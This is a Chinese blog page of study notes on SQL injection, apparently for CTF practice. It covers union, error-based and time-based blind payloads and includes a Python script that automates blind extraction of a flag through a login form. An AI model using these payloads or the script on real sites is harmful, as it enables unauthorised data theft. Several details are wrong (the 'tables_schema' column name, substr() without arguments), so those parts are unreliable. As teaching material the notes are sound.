<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="szkangcheng">
    
    <title>
        
            SQL |
        
        SZKC&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/avatar.jpg">
    
    
<link rel="stylesheet" href="/font/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/font/css/regular.min.css">

    
<link rel="stylesheet" href="/font/css/solid.min.css">

    
<link rel="stylesheet" href="/font/css/brands.min.css">

    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"szkangcheng.github.io","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#c0392b","title":"SZKC's Blog","author":"szkangcheng","avatar":"/images/avatar.jpg","logo":"/images/avatar.jpg","favicon":"/images/avatar.jpg"},"menu":{"home":"/","archives":"/archives"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"Keep writing and Keep loving.","hitokoto":true},"social_contact":{"enable":false,"links":{"github":null,"weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":false,"percent":false,"hide_header":true},"home":{"announcement":null,"category":false,"tag":false,"post_datetime":"updated"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":false,"min2read":false},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":false,"share":false,"reward":{"enable":false,"img_link":null,"text":null,"icon":null}},"code_block":{"tools":{"enable":false,"style":"default"},"highlight_theme":"default"},"toc":{"enable":false,"number":false,"expand_all":false,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":false,"site_uv":false,"site_pv":false,"page_pv":false}},"local_search":{"enable":false,"preload":false},"comment":{"enable":true,"use":"twikoo","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":"https://twikoo-api-beige-one.vercel.app/","region":null,"version":"1.6.44"},"waline":{"server_url":null,"reaction":false,"version":"3.3.2"},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":false},"cdn":{"enable":false,"provider":"cdnjs"},"pjax":{"enable":false},"footer":{"since":2020,"word_count":false,"site_deploy":{"enable":false,"provider":"github","url":null},"record":{"enable":false,"list":[{"code":null,"link":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{},"version":"4.2.5"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left flex-start border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/avatar.jpg">
                </a>
            
            <a class="site-name border-box" href="/">
               SZKC&#39;s Blog
            </a>
        </div>

        <div class="right border-box">
            <div class="pc border-box">
                <ul class="menu-list border-box">
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/">
                                
                                首页
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/archives">
                                
                                归档
                                
                            </a>
                            
                        </li>
                    
                    
                </ul>
            </div>
            <div class="mobile border-box flex-start">
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list border-box">
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/">
                            
                            首页
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/archives">
                            
                            归档
                        </a>
                        
                    </label>
                    
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        SQL
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/avatar.jpg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">szkangcheng</span>
                                
                                    <span class="author-badge">Lv1</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2025-07-05 15:19:55</span>
            </span>

            
                <span class="meta-info-item post-update-date">
                    <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                    <span class="datetime" data-updated="Sat Jul 05 2025 15:20:25 GMT+0800">2025-07-05 15:20:25</span>
                </span>
            
        

        

        

        
        
        
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body ">
                    

                    
                         <p>SQL简介：SQL注入是一种常见的网络安全攻击手段，攻击者通过在输入字段中插入恶意的SQL代码，从而操纵后端数据库查询。如果应用程序未对用户输入进行适当的验证和过滤，攻击者可以利用SQL注入获取、修改或删除数据库中的敏感数据，甚至控制整个数据库服务器。</p>
<h1 id="SQL注入的原理"><a href="#SQL注入的原理" class="headerlink" title="SQL注入的原理"></a>SQL注入的原理</h1><ol>
<li><strong>用户输入未经验证</strong>：应用程序直接将用户输入的数据拼接到SQL查询中。</li>
<li><strong>恶意SQL代码注入</strong>：攻击者在输入中插入SQL语句，改变原查询的逻辑。</li>
<li><strong>数据库执行恶意代码</strong>：数据库执行被篡改的查询，导致数据泄露或破坏。</li>
</ol>
<h2 id="示例"><a href="#示例" class="headerlink" title="示例"></a>示例</h2><p>假设有一个登录表单，用户输入用户名和密码，后端SQL查询如下：</p>
<p>sql</p>
<p>复制</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE username = &#x27;user_input&#x27; AND password = &#x27;user_password&#x27;;</span><br></pre></td></tr></table></figure>

<p>如果用户输入 <code>admin&#39; --</code> 作为用户名，查询变为：</p>
<p>sql</p>
<p>复制</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE username = &#x27;admin&#x27; --&#x27; AND password = &#x27;user_password&#x27;;</span><br></pre></td></tr></table></figure>

<p><code>--</code> 是SQL注释符，后续部分被忽略，攻击者可能无需密码即可登录。</p>
<h1 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h1><h2 id="特殊数据库"><a href="#特殊数据库" class="headerlink" title="特殊数据库"></a>特殊数据库</h2><p>在MySQL 5.0版本之后，MySQL默认在数据库中存放一个<code>information_schema</code>的数据库，在该库中，需要记住三个表名，分别是：<code>schemata</code>、<code>tables</code>、<code>columns</code>。</p>
<ol>
<li><p><code>schemata</code>表存储该用户创建的所有数据库的库名。</p>
<p>&gt;&gt;&gt;&gt;其中记录<strong>数据库库名的字段名为</strong>：<code>schema_name</code>。</p>
</li>
<li><p><code>tables</code>表存储该用户创建的所有数据库的库名和表名。</p>
<p>&gt;&gt;&gt;&gt;其中记录<strong>数据库库名</strong>和<strong>表名的字段名分别是</strong>：<code>tables_schema</code>和<code>table_name</code>。</p>
</li>
<li><p><code>columns</code>表存储该用户创建的所有数据库的库名、表名和字段名。</p>
<p>&gt;&gt;&gt;&gt;其中记录<strong>数据库库名、表名和字段名的字段名分别是</strong>：<code>tables_schema</code>、<code>table_name</code>和<code>column_name</code>。</p>
</li>
</ol>
<h2 id="注释符"><a href="#注释符" class="headerlink" title="注释符"></a><strong>注释符</strong></h2><p>在MySQL中，常见注释符的表达方式：</p>
<p> <strong><code>#</code> ……</strong> ：<code>#</code>号后面的都会被注释</p>
<p> <strong><code>--</code> ……</strong> ：<code>--</code>号后面的都会被注释，不过在 <code>--</code> 的前后都<strong>需要加空格</strong>再加数据(GET传参时只能使用<code>--</code>，后的<strong>空格用<code>+</code>代替</strong>)</p>
<p> <strong><code>/ *... */</code></strong> ：在查询语句中使用斜杠星号注释，从 &#x2F; 开始到 *&#x2F; 结束的部分都被视为注释，不会被执行。</p>
<ul>
<li>但**<code>/* ... */</code>** 的特殊用法-<strong>-条件注释</strong></li>
</ul>
<p>条件注释是一种特殊的注释语法，它允许在<strong>注释中使用关键字</strong>，而这些关键字在执行查询时会被<strong>解析为相应的操作</strong>。</p>
<p>语法格式为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sql</span><br><span class="line">/*!&lt;conditional_keyword&gt; &lt;query_part&gt; */</span><br></pre></td></tr></table></figure>

<p>例如：<code>index?id=-10 /*!union*/ /*!select*/ 1,2,3</code>等同于<code>index?id=-10 union select 1,2,3</code></p>
<h2 id="SQL注入常用基础语句"><a href="#SQL注入常用基础语句" class="headerlink" title="SQL注入常用基础语句"></a><strong>SQL注入常用基础语句</strong></h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">sql</span><br><span class="line">select version(); #查看数据库版本 </span><br><span class="line"></span><br><span class="line">select user(); #查看数据库用户</span><br><span class="line"></span><br><span class="line">select database(); #查看当前库名;</span><br><span class="line"></span><br><span class="line">select table_name from information_schema.tables where table_schema=database() ; #查看当前库下的表名</span><br><span class="line"></span><br><span class="line">select group_concat(table_name) from information_schema.tables where table_schema=database() ; </span><br><span class="line">#只回显一行数据下查看当前库下的全部表名</span><br><span class="line"></span><br><span class="line">select column_name from information_schema.columns where table_schema=database() and table_name=&#x27;xxx&#x27;; </span><br><span class="line">#查询列名-把xxx缓存前面查询到的表名</span><br></pre></td></tr></table></figure>

<h2 id="SQL注入常用函数与技巧"><a href="#SQL注入常用函数与技巧" class="headerlink" title="**SQL注入常用函数与技巧"></a>**SQL注入常用函数与技巧</h2><h3 id="联合查询"><a href="#联合查询" class="headerlink" title="联合查询"></a>联合查询</h3><p><strong>1.</strong><code>concat()</code>函数</p>
<p> <code>concat()</code>函数：将多个<strong>不同字段</strong>的字符串连接成一个字符串。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sql</span><br><span class="line">concat(str1，str2) #语法</span><br></pre></td></tr></table></figure>

<p>注意：返回结果为连接参数产生的字符串，如果有任何一个参数为null，则返回值为null。</p>
<p><strong>2.</strong><code>group_concat()</code>函数</p>
<p> <code>group_concat()</code> 将多个<strong>同个字段</strong>的字符串连接成一个字符串。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sql</span><br><span class="line">group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc] [separator ‘分隔符’]) #语法</span><br></pre></td></tr></table></figure>

<p>**3.**order by函数<br>用于判断表中实际包含的列数</p>
<p>select * from … order by 1(按照第一列进行升序排列)</p>
<p>select * from … order by 2</p>
<p>select * from … order by 3 …</p>
<p>知道报错为止，这样可以知道具体有多少个列；<br>（当然直接查询列名也可以）</p>
<p>*<em>4.<em><strong>group by</strong></em></em>语句：用于结合合计函数，根据一个或多个列队结果集进行分组。</p>
<p> gourp by x：是会根据x的规则队数据进行分组，而分组的时候，MySQL会建立一个临时空表来进行分组。</p>
<p>*<em>5</em>***substr()****函数：用来截取数据库某个字段中的一部分。</p>
<p>语法：substr(string，start，length)</p>
<p>参数：string：必选，数据库中需要截取的字段</p>
<p>   start：必选。正数，从字符串指定位置开始截取；负数，从字符串结尾指定位置开始   截取；0，在字符串中第一个位置开始截取。</p>
<p>   length：可选，需要截取的长度。缺省。即截取到结束位置</p>
<p>*<em>6</em>**<em>ascii()<strong><strong>函数：返回字符串str</strong></strong>的最左边的数值。</em>*</p>
<p>语法：ascii(str)</p>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><p><strong>1.</strong><code>extractvalue()</code>函数</p>
<p> <em>从 MySQL 5.7.8 版本开始，<code>ExtractValue()</code> 函数已被弃用</em></p>
<p> <code>ExtractValue()</code> 函数来提取 XML 字符串中的特定路径的值。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">plaintext</span><br><span class="line">ExtractValue(xml_frag, xpath_expression)</span><br></pre></td></tr></table></figure>

<ul>
<li>xml_frag：xml文档对象的名称，是一个string类型。</li>
<li>xpath_expr：使用xpath语法格式的路径。</li>
</ul>
<p><strong>payload:</strong></p>
<p><strong>select * from text where id&#x3D;1 and extractvalue(null,concat(0x7e,(select database()),0x7e))</strong></p>
<p><strong>2.<code>updataxml()</code>函数</strong></p>
<ul>
<li>xml_target：xml文档对象的名称，是一个string类型。</li>
<li>xpath_expr：使用xpath语法格式的路径。</li>
<li>new_xml：需要更新的内容。</li>
</ul>
<p>payload实例：</p>
<p>在这里需要触发错误获得数据显示，我们可以将xml_frag写为null或其他显然不符合xml格式的东西（比如数字）</p>
<p>将xpath_expr写为不符合条件的查询式子，例如0x7e,(select database()),0x7e    </p>
<p> <em><strong>tip:0x7e是~的一种16进制写法，在这里，sql语句不支持U+写法，比如U+007E</strong></em><strong>，支持0x开头的16进制写法</strong></p>
<p>直接查阅资料得到~的16进制写法为7E，所以在这里写作0x7e</p>
<p><strong>payload：</strong></p>
<p><strong>select * from text where id&#x3D;1 and updatexml(null,concat(0x7e,(select database()),0x7e),null)</strong></p>
<h3 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h3><p><strong>1.</strong><code>substr()/substring()</code>函数</p>
<p> <code>substr()/substring()</code>函数：用来截取数据库某个字段中的一部分。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sql</span><br><span class="line">substr(string，start开始位置，length截取长度)  #语法</span><br><span class="line">payload:</span><br><span class="line">?id=&#x27;&#x27; or substr(database(),1,1)=&#x27;s&#x27;#</span><br></pre></td></tr></table></figure>

<p>参数</p>
<ul>
<li>string：必选，数据库中需要截取的字段</li>
<li>start：必选。正数，从字符串指定位置开始截取；负数，从字符串结尾指定位置开始 截取；0，在字符串中第一个位置开始截取。</li>
<li>length：可选，需要截取的长度。缺省。即截取到结束位置</li>
</ul>
<p><strong>2.</strong><code>ascii()</code>函数(和substr函数功能类似)</p>
<p> <code>ascii()</code>函数：返回字符串str的最左边的数值。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">sql</span><br><span class="line">ascii(str)  #语法</span><br><span class="line">payload:</span><br><span class="line">?id=&#x27;&#x27; or ascii(substr(database(),1,1))=&#x27;w&#x27;#</span><br><span class="line">或者</span><br><span class="line">select ascii(database())返回左边字符</span><br></pre></td></tr></table></figure>

<p><strong>2.</strong><code>length()</code> 函数，返回字符串的长度</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sql</span><br><span class="line">length(str) #语法</span><br><span class="line">payload:</span><br><span class="line">?id=&#x27;&#x27; or length(database())&gt;3#</span><br></pre></td></tr></table></figure>

<p><strong>时间盲注思路：</strong><br>在网页不显示任何有效信息的情况下（包括报错信息），采用sleep函数和if函数进行比对</p>
<p>即–&gt;满足条件就陷入沉睡；</p>
<p>用此语句判断数据库名字长度</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload:</span><br><span class="line"></span><br><span class="line">select * from test where id=&#x27;&#x27; or if((length(database()))&gt;3,sleep(5),0)</span><br></pre></td></tr></table></figure>

<p>if语句：if（条件,正确时执行,错误时执行）(执行0时没什么鸟用)</p>
<p>逐个判断数据库名字的每一个字符</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload：</span><br><span class="line"></span><br><span class="line">select * from test where id=&#x27;&#x27; or if((substr(database(),1,1))=&#x27;w&#x27;,sleep(5),0)</span><br></pre></td></tr></table></figure>

<p>判断表(列)的个数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload：</span><br><span class="line"></span><br><span class="line">select * from test where id=&#x27;&#x27; or if((select count(*) from information_schema.tables where table_schema=&#x27;...&#x27;)&gt;3,sleep(5),0)</span><br></pre></td></tr></table></figure>

<p>判断第一个表的名称 </p>
<p>limit a,b：跳过第a条，查询b条</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload：</span><br><span class="line"></span><br><span class="line">select * from test where id=&#x27;&#x27; or if((select substr(table_name) from information_schema.tables where table_schema=&#x27;...&#x27; limit 0,1)&gt;3,sleep(5),0)</span><br></pre></td></tr></table></figure>

<p>判断第一个列的名称</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload：</span><br><span class="line"></span><br><span class="line">select * from test where id=&#x27;&#x27; or if((select substr(column_name) from information_schema.columns where table_schema=&#x27;...&#x27; and table_name=&#x27;...&#x27; limit 0,1)&gt;3,sleep(5),0)</span><br></pre></td></tr></table></figure>

<p>使用ai脚本进行计算：(输入框版)：<strong>（不建议把时间压得太短！！！）</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import string</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">#配置目标 URL 和基础信息</span><br><span class="line"></span><br><span class="line">url = &quot;........&quot;</span><br><span class="line">username_template = &quot;&#x27; or if((select substr(value,&#123;index&#125;,1) from flag)=&#x27;&#123;char&#125;&#x27;,sleep(3),0)#&quot;</span><br><span class="line">#填写payload</span><br><span class="line">password = &quot;0&quot;</span><br><span class="line"></span><br><span class="line">#用于测试的字符集（可以根据实际情况扩展）</span><br><span class="line"></span><br><span class="line">charset = string.ascii_letters + string.digits + &quot;&#123;&#125;_-&quot;</span><br><span class="line"></span><br><span class="line">def time_blind_injection():</span><br><span class="line">    extracted_value = &quot;&quot;</span><br><span class="line">    index = 1  # 从第1个字符开始</span><br><span class="line"></span><br><span class="line">    while True:</span><br><span class="line">        found = False</span><br><span class="line">        for char in charset:</span><br><span class="line">            payload = username_template.format(index=index, char=char)</span><br><span class="line">            start_time = time.time()</span><br><span class="line">            </span><br><span class="line">            # 发送 POST 请求</span><br><span class="line">            response = requests.post(url, data=&#123;&quot;username&quot;: payload, &quot;password&quot;: password&#125;)</span><br><span class="line">            elapsed_time = time.time() - start_time</span><br><span class="line">            </span><br><span class="line">            # 判断响应时间是否超过3秒</span><br><span class="line">            if elapsed_time &gt; 3:</span><br><span class="line">                extracted_value += char</span><br><span class="line">                print(f&quot;[+] Found character at position &#123;index&#125;: &#123;char&#125;&quot;)</span><br><span class="line">                found = True</span><br><span class="line">                break</span><br><span class="line">    </span><br><span class="line">        if not found:  # 如果在当前索引没有找到字符，说明到达字符串末尾</span><br><span class="line">            print(&quot;[+] Extraction complete!&quot;)</span><br><span class="line">            break</span><br><span class="line">    </span><br><span class="line">        index += 1</span><br><span class="line">    </span><br><span class="line">    return extracted_value</span><br><span class="line"></span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    print(&quot;[*] Starting time-based blind SQL injection...&quot;)</span><br><span class="line">    result = time_blind_injection()</span><br><span class="line">    print(f&quot;[+] Extracted value: &#123;result&#125;&quot;)</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h3 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h3><h2 id="注入点分类"><a href="#注入点分类" class="headerlink" title="注入点分类"></a><strong>注入点分类</strong></h2><h3 id="①数字型注入点"><a href="#①数字型注入点" class="headerlink" title="①数字型注入点"></a><strong>①数字型注入点</strong></h3><p><strong>类似的后端语句</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">php</span><br><span class="line">$id=$_GET[&#x27;id&#x27;];</span><br><span class="line">$sql=&quot;SELECT * FROM users WHERE id=$id LIMIT 0,1&quot;;</span><br><span class="line">$result=mysql_query($sql);</span><br><span class="line">$row = mysql_fetch_array($result);</span><br></pre></td></tr></table></figure>

<p>在 Web 端大概是 <code>http://xxx.com/index.php?id=1</code> 这种形式，其<strong>注入点 id 类型为数字</strong>，所以叫数字型注入点。</p>
<p>用<code>1 and 1=1</code>进行组合出来的sql注入语句为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">plaintext</span><br><span class="line">select * from news where id=1 and 1=1</span><br></pre></td></tr></table></figure>

<h3 id="②字符型注入点"><a href="#②字符型注入点" class="headerlink" title="②字符型注入点"></a>②字符型注入点</h3><p><strong>类似的后端语句</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">php</span><br><span class="line">$id=$_GET[&#x27;id&#x27;];</span><br><span class="line">$sql=&quot;SELECT * FROM users WHERE id=&#x27;$id&#x27; LIMIT 0,1&quot;;</span><br><span class="line">$result=mysql_query($sql);</span><br><span class="line">$row = mysql_fetch_array($result);</span><br></pre></td></tr></table></figure>

<p>在 Web 端大概是 <code>http://xxx.com/index.php?id=admin</code> 这种形式，其<strong>注入点id 类型为字符类型</strong>，所以叫字符型注入点。</p>
<p>使用<code>id=1&#39; and 1=1 --+</code>组合出来的sql注入语句为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sql</span><br><span class="line">select * from news where id=&#x27;admin&#x27; and 1=1 --+&#x27; LIMIT 0,1&quot;;</span><br></pre></td></tr></table></figure>

<p><strong>注意多了一个引号</strong>。由于注入拼接语句后多了一个<code>&#39;</code>,<strong>需要用注释符进行消除对语句的影响</strong></p>
<h3 id="③搜索型注入点"><a href="#③搜索型注入点" class="headerlink" title="③搜索型注入点"></a>③搜索型注入点</h3><p>这是一类特殊的注入类型。这类注入主要是指在进行数据搜索时没过滤搜索参数，一般在链接地址中有“keyword&#x3D;关键字”，有的不显示在的链接地址里面，而是直接通过搜索框表单提交。此类注入点提交的 SQL 语句，其原形大致为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">sql</span><br><span class="line">select * from 表名 where 字段 like &#x27;%关键字%&#x27;`。</span><br><span class="line"></span><br><span class="line">组合出来的sql注入语句为：</span><br><span class="line">select * from news where search like &#x27;%测试 %&#x27; and &#x27;%1%&#x27;=&#x27;%1%&#x27;</span><br><span class="line"></span><br><span class="line">测试%&#x27; union select 1,2,3,4 and &#x27;%&#x27;=&#x27;</span><br></pre></td></tr></table></figure>

<h2 id="判断注入点"><a href="#判断注入点" class="headerlink" title="判断注入点"></a><strong>判断注入点</strong></h2><p><strong>注意区别语句报错与页面报错、页面数据不正确的区别</strong></p>
<p> 1.<code>?id=1 and 1=1</code> 和<code>?id=1 and 1=2</code>进行测试如果1&#x3D;1页面显示正常和原页面一样，并且1&#x3D;2页面报错或者页面部分数据显示不正常，那么可以确定此处为数字型注入。</p>
<p> 2.<code>?id=1&#39; and 1=1 --+ / #</code>和<code>?id=1&#39; and 1=2 --+ / #</code>或使用<code>?id&#39; and &#39;1&#39;=&#39;1</code>和<code>?id&#39; and &#39;1&#39;=&#39;2</code>进行测试如果1&#x3D;1页面显示正常和原页面一样，并且1&#x3D;2页面报错或者页面部分数据显示不正常，那么可以确定此处为字符型注入。</p>
<p> 3.<code>?id=1%&#39; and 1=1 --+ / #</code>和<code>?id=1%&#39; and 1=2 --+ / #</code>进行测试如果1&#x3D;1页面显示正常和原页面一样，并且1&#x3D;2页面报错或者页面部分数据显示不正常，那么可以确定此处为搜索型注入。</p>

                    
                </div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2025/07/19/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"
                                   title="PHP反序列化"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">PHP反序列化</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2025/07/05/rce-title/"
                                   title="rce"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">rce</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    


    <div class="comments-container border-box">
        <div id="comments-anchor" class="comment-area-title border-box">
            <i class="fas fa-comments"></i>&nbsp;评论
        </div>
        <div class="comment-plugin-fail border-box">
    <span class="fail-tip">评论插件加载失败</span>
    <button class="reload keep-button">点击重新加载</button>
</div>
<div class="comment-plugin-loading flex-center border-box">
    <i class="loading-icon fa-solid fa-spinner fa-spin"></i>
    <span class="load-tip">正在加载评论插件</span>
</div>
<script data-pjax>
  window.KeepCommentPlugin = {}
  window.KeepCommentPlugin.hideLoading = () => {
    const cplDom = document.querySelector('.comments-container .comment-plugin-loading')
    cplDom.style.display = 'none'
  }
  window.KeepCommentPlugin.loadFailHandle = () => {
    window.KeepCommentPlugin.hideLoading()
    const cpfDom = document.querySelector('.comments-container .comment-plugin-fail')
    cpfDom.style.display = 'flex'
    cpfDom.querySelector('.reload').addEventListener('click', () => {
      window.location.reload()
    })
  }
</script>

        
            

    <div class="twikoo-container">
        <div id="twikoo-comment"></div>
        <script 
